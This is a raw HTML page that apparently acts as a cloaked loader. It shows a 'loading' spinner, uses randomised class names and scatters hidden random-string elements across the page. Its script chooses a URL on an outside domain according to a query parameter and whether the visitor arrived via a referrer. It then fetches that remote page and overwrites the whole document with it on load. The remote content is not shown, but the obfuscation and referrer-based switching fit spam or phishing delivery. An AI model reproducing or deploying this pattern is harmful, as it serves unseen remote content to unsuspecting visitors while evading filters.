<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .N4INeImOh2K {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .N4INeImOh2K .wyaRv7u4F1 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .N4INeImOh2K .content {
            line-height: 50px;
            text-align: center
        }

        .N4INeImOh2K .img {
            width: 100%
        }

        .N4INeImOh2K .Ww8Fl1 {
            text-align: center
        }

        .N4INeImOh2K .Ww8Fl1 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .N4INeImOh2K .Ww8Fl1 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .N4INeImOh2K .Ww8Fl1 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .N4INeImOh2K .Ww8Fl1 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .N4INeImOh2K .Ww8Fl1 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .N4INeImOh2K .Ww8Fl1 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .N4INeImOh2K .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function wBmEue7sMPNK(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Y0FRD = wBmEue7sMPNK('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Y0FRD +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Y0FRD +".html?a=share";
		}
		
        tyCpTKWF4=url+"#"+new Date().getTime();
        tyCpTKWF4 && function() {
            $.get(tyCpTKWF4, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>i6uZpRM5O7ke1kjT2rMj2oIyMBUsl5DznQMR5cCIRe</p>
<li style='display:none' >obcnfl1fGDqBYa3RR1RqYrW1unOsKTr</li>
<p  style='display:none'>i6uZpRM5O7ke1kjT2rMj2oIyMBUsl5DznQMR5cCIRe</p><div class="N4INeImOh2K">
    <div class="wyaRv7u4F1">
        <div class="Ww8Fl1">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >pRBM9Xj57QY8dWh1a65G1ZZDpfrJIIBGtnC4jLk5WYweAk5X</h1>
<ul style='display:none' >xPqlp2IBCgGFFa6x1dcNK0ncuVOwNLCWsuH6Mznj3B</ul>
<li style='display:none' >rXCtmUZu3EPwMOU4au1kpqC78nZYDWZ2U4A58r4cUzSL5WFmvEhf7qrw6ZtiCCtqDF2JPNy8mRtCd8YReKZ1qoaMRfo</li>
<img  src='' style='display:none'>
<li style='display:none' >rXCtmUZu3EPwMOU4au1kpqC78nZYDWZ2U4A58r4cUzSL5WFmvEhf7qrw6ZtiCCtqDF2JPNy8mRtCd8YReKZ1qoaMRfo</li>
<h1 style='display:none' >pRBM9Xj57QY8dWh1a65G1ZZDpfrJIIBGtnC4jLk5WYweAk5X</h1>
<ul style='display:none' >xPqlp2IBCgGFFa6x1dcNK0ncuVOwNLCWsuH6Mznj3B</ul>
<p  style='display:none'>R3N0vzLW0lzpSldR1OtjL9u7h</p></body>
</html>